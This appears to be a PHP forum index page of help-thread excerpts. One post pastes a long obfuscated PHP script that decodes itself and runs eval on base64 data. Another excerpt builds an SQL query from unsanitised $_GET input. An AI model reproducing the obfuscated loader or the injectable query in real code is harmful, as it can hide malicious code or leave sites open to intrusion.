39,388 Topics
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![]() | Hi guys, This one has got me completely stumped. Here are my trouble shooting notes. My upload script works absolutely fine without any changes on localhost. However, on the live production server my files do not get uploaded. My view is: <?php echo form_open_multipart('upload/do_upload');?> <input type="file" name="userfile" size="20" /> <br/> … ![]() |
I have some errors while trying to fix the following codes: update_image2.php <?php //LOAD IMAGE TABLE if (!empty($_GET['image_id'])){ $result = mysql_query("SELECT * FROM image_upload WHERE image_id='".$_GET['image_id']."'") or die(mysql_error()); $data = mysql_fetch_array($result); $image_id = $_GET['image_id']; $newfilename = $data['newfilename']; $class = $data['class']; $location = $data['location']; $minwidth = $data['minwidth']; $maxwidth = $data['maxwidth']; $minheight … | |
Hello Friends, Am working on a greeting card project (like www.funkypigeon.com) where after customizing a card, you can submit it to DB and a thumbnail of what you created will be generated. At submitting the card, I generate d customization in txt like below.But how do i generate a thumnail … | |
I stored a password in db, nw i want to change my password, with the fields of old password, new password, and confirm password my question is how to retrive or compare password that i have entered in db with old password that i`m going to enter . if it … ![]() | |
Hello. I am tasked with making a small survey for internal use. I have the HTML made up where it asks for a incident number (6 digit number) and has 15 checkbox items. Users here will goto the survey as needed, type in an incident number and check the box … ![]() | |
<? abstract class BaseData { protected $connection; public function __construct($connection) { $this->connection = $connection; } abstract public function connected(); abstract public function get(); } class UserData extends BaseData { public function exists() { return is_connected($this->connection); } public function get() { return get_data($this->connection); } } $UserData = new UserData(new Connection()); ?> … ![]() | |
hi all... how to categorize multiple values in a table field. for ex:- id Field 1 Adult 2 Adult 3 Child 4 Child 5 Senior 6 Senior i.e, 3 category Adult as 1,Child as 2, Senior as 3 i want the result as like this count catname 1 of 1 … ![]() | |
book a seat and move to user histoy page and see his booked seats . is this a good way ? what should i do , i do not know :( (airline seat reservation) <?php session_start(); if(!isset($_COOKIE['loggedin'])){ header("location:index.php"); } ?> <html> <head> <title><?php echo $_SESSION['user'];?></title> <style type="text/css"> h5 { position: … | |
I have these two script which work differently & want to merge as one.I tried lot,either script A work or script B,but not working together in single.Pls help to write them as single. Script A: <?php $target_dir = "uploads/"; $target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]); $uploadOk = 1; $imageFileType = pathinfo($target_file,PATHINFO_EXTENSION); … | |
Hello Guys, I dont know how to do these, i have a existing code from the internet and use it and Successful Ok. But i dont kow how to save this to database. can you please help me guys? thanks in advance this is my code <link rel="stylesheet" href="../css/bootstrap-3.1.1.min.css" type="text/css" … | |
<?php include 'Classes/PHPExcel.php'; include 'Classes/PHPExcel/Writer/Excel2007.php'; include 'Classes/PHPExcel/IOFactory.php'; require_once 'Spreadsheet\Excel/Writer.php' ; require_once 'Spreadsheet\Excel\Writer/Workbook.php' ; //E:\Program Files\EasyPHP-DevServer-14.1VC11\data\localweb\generer\Spreadsheet\Excel\Writer try { echo date('H:i:s') . " Create new PHPExcel object\n"; echo "redderr " ; $data = new Spreadsheet_Excel_Reader("GenerationDesNoeuds.xls"); $data->dump($row_numbers=false,$col_letters=false,$sheet=0,$table_class='excel') $workbook = new Spreadsheet_Excel_Writer('GenerationDesNoeuds.xls'); $worksheet =& $workbook->addWorksheet('My first worksheet'); if (PEAR::isError($worksheet)) { die($worksheet->getMessage()); } $workbook->close(); exit … | |
Dear user I write a file upload code in php, the code work's fine but it will upload the file 50kb to 60kb, when i try to upload more then 50kb to 60 kb file then the page stuck on loading. The problem is why it is not uploading more … | |
![]() | Sup guys. So I have an email question. Basically, we've got around 4 employees in our office we've been managing to get away with gmail accounts and luckily registered when they were giving it away free. Anyhow we've joined with a new company, he currently has his mailboxes on plesk. … ![]() |
![]() | Hi, I'm a 16 year old web designer and aspiring developer. I've learned the ins and outs of making a website look amazing, but I'm only now starting to try to figure out how the heck it's all possible. One of the things I run into with every site I … |
Hi guys, i want to populate a drop down list with ajax, and so when i select the first option thesecond one select must be populated in table like if shoose <select><option>value one</option> <option>value two</option></select> was supoose be populated the second value in another select, but i want be populated … | |
Hi Can any one please help me on the below issue. i can able to display values for texbox. but i don't know how to load the values for <div id='txtHint' name='ptype'></div> and if i change any value in conn_type it has to display. **test.php** <form action="<?php $_PHP_SELF ?>" method="post" … | |
Hey everyone. First I'd like to say this is a great community and seeing as I've finally started attempting to learn PHP I decided I'd finally sign up for all of the current and future help I will need haha. Okay well I'm currently setting up a website for my … | |
Hi, I have a list of several thousand words that I want to use to create a list of all possible combinations of those words (only two words in each combination though). e.g. word1 word2 word3 word4 to word1word2 word1word3 word1word4 and so on. I would usually do this in … | |
I don not know about **Multiple inheritance in php**. Can anyone give me example with a brief explanantion . | |
what this scrypt ??? <?php /* Copyright © By 5SRV.COM - All Rights Reserved */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0xecc;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGI1KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdieUthd0R0MkZwOGg5cmMxWEJ1WWpkMys0UFQ3bHovRXZHTmtPTWZWWm5nZVdIQW1VMDZMeFM1Q3FJUUppc29SPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>td|m]ue[[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Google has been quick to blacklist domains implicated, most often unwittingly, in the distribution of what has become known as the SoakSoak malware campaign courtesy of soaksoak.ru being the first domain in the redirection path it used. With 11,000 domains blocked over the weekend, you might be forgiven for thinking … | |
A.o.e any one can hlp me i want to image store in data base but i have problem mentiond here : Undefined index: pics in C:\wamp\www\newform\image_store.php on line 7 what i do | |
Hi, how to reverse first name and last name of string in dynamically. ex: input:: hello php world output:: world php hello | |
Please I tried comparing values in two arrays using in_array(). $friends[] contains all ids of my friends in the friends table while $membersarray[] contains ids of people in a team. What i'am trying to do here using in_array() is that I want only friends ids who are not part of … | |
Hello, I have a app where each page has an undefined number of tables (Meaning on one page we may have 3 tables and on another we may have 15). They are all dynamically populated with values from a MySQL Database, creating a template of sorts. The idea behind this … ![]() | |
I think php is a hardar part of programming. But wanna step forward in this field. please assist me all of my friends around. Thanks ![]() | |
![]() | This is driving me mad, I'm sure I'm missing something. I save the £ sign into the database and it displays fine when I check the database, but when I print this out in a pdf it displays as £. I can't use modify headers because I'm previewing a pdf … ![]() |
i have build a project where wordpress themes can be purchased. Build with Codeigniter how to implement multiple coupons for a single Theme / Item for % discount. i need some help regarding database design. | |
Thanks in advance I have used periodic Ajax call for getting a value from the API result in WordPress with Ajax Here is my code Javascript code is : setInterval('getRecentAPI(oid)', 60000); function getRecentAPI(oid){ jQuery.ajax({ type: "POST", url: ajaxurl, data: {id:oid, action:'recent_value'}, success: function(result){ jQuery(".recent div").html(result); } }); } WordPress code … | |
Hey I write this code for delete the selected check box values from the database. Yeah I know there are some example already here. But when I take look on them and tried to do as per they done in their question. still doesn't get the success. Can you guys … |
The End.